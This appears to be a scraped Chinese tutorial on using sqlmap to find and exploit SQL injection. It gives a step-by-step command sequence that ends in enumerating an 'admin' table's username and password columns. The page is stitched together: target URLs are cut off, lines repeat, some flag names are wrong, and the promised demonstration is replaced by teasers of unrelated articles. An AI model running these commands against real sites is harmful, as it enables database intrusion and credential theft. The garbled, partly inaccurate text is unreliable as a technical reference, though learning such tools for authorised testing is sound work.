1.準備
工具:sqlmap(需在python環境中執行)
環境:windows+python
安裝sqlmap
官網 選擇最近版本安裝即可
安裝sqlmap
官網 選擇最近版本安裝即可
設定環境變數
為了使用便利,將sqlmap的安裝目錄新增到系統環境變數path中
之後在cmd中就可以直接使用sqlmap了
不設定環境變數的話,要把cmd的當前目錄切換到sqlmap安裝目錄才可以使用
2.sqlmap常用命令介紹
sqlmap.py -u 「
判斷id引數是否存在注入:結果中包含 「id」 is vulnerable 字段表示存在注入
存在注入,下面的步驟才可以執行成功
sqlmap.py -u 「 --dbs
列舉能列出的所有資料庫名
sqlmap.py -u 「 --current-db
列出當前使用的資料庫名,假設列出「sqltest」資料庫
sqlmap.py -u 「 --is-dba
判斷該注入點是否有管理員許可權:返回true 表示是管理員
sqlmap.py -u 「 -d 「sqltest」 --tables
獲取sqltest中的所有表,假設有"admin"表
sqlmap.py -u 「 -d 「sqltest」 -t 「admin」 --columns
列舉表admin的字段(列名),假設存在"username","password"字段
至此,對乙個簡單的注入點(get方式),現在就已經得到了我們想要的資料
想看工具的注入過程 使用-v引數
-level 會提高注入等級(預設0 只會判斷get,post引數是否有注入點)
若注入點是post方式,或是注入點是cookie,user-agent中,可以利用-date 引數 -cookie引數指定
當然用buip suite架個**,擷取資料報,直接 -r 引數引入資料報也可以完成上述的注入情況的~
3.例項演示
網路安全 sql 注入
未經允許萬不可隨意測試 請在法律的允許下使用,謹記謹記!網路安全 sql 注入 位址列輸入在資料庫可以執行的語句,並進入資料庫查到資料 例 ww.com?id 1 and 1 1 轉 資料庫sql 語句 select from 表名 where id 1 and 1 1 ww.com?id 1234...
網路安全知識之SQL注入
所謂sql注入,就是通過把sql命令插入到web表單提交或輸入網域名稱或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的sql命令。具體來說,它是利用現有應用程式,將 惡意 的sql命令注入到後台資料庫引擎執行的能力,它可以通過在web表單中輸入 惡意 sql語句得到乙個存在安全漏洞的 上的資料庫,...
3 SQL注入漏洞利用與防禦
3.3.2 pangolin 自sql資料庫應用於web應用時,本章重點sql注入的發展 成因 利用及其防禦。sql命令是前台與後合互動的視窗,使資料可傳輸到web應用程式。很多 會利用使用者輸入的引數動態形成sql查詢。攻擊者在url 表單,或者htp請求頭部輸入惡意的sql命令,如果這個站點存在...